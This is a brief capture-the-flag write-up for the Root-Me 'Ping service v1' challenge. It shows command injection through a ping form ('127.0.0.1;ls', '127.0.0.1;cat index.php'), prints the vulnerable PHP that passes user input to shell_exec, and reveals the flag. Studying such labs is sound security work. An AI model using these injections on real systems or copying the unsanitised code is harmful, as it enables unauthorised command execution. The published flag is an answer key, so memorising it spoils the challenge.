Rootme Ping service v1
Root-me
Command Injection
Ping service v1
The challenge is asking us to find a vulnerability in the service. The flag is located on the index.php file.
If we look at the challenge, we’re greeted by a input pox that contains a local ip. If we try to input 127.0.0.1 and we submit it we get this:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.033 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.033/0.039/0.047/0.007 ms
So basically the service pings something.
We’ll just the service to do an ls in it’s current location.
We’ll use the command 127.0.0.1;ls
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.028 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.033 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.026 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.026/0.029/0.033/0.003 ms
index.php
The we the location of the index.php, we’ll do a cat on it now.
127.0.0.1;cat index.php
If we then look at the source code, we’ll see what the flag.
<?php
$flag = "S3rv1ceP1n9Sup3rS3cure";
$ip = $_POST["ip"];
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
$response = shell_exec("ping -c 3 ".$ip);
echo $response;
}
?>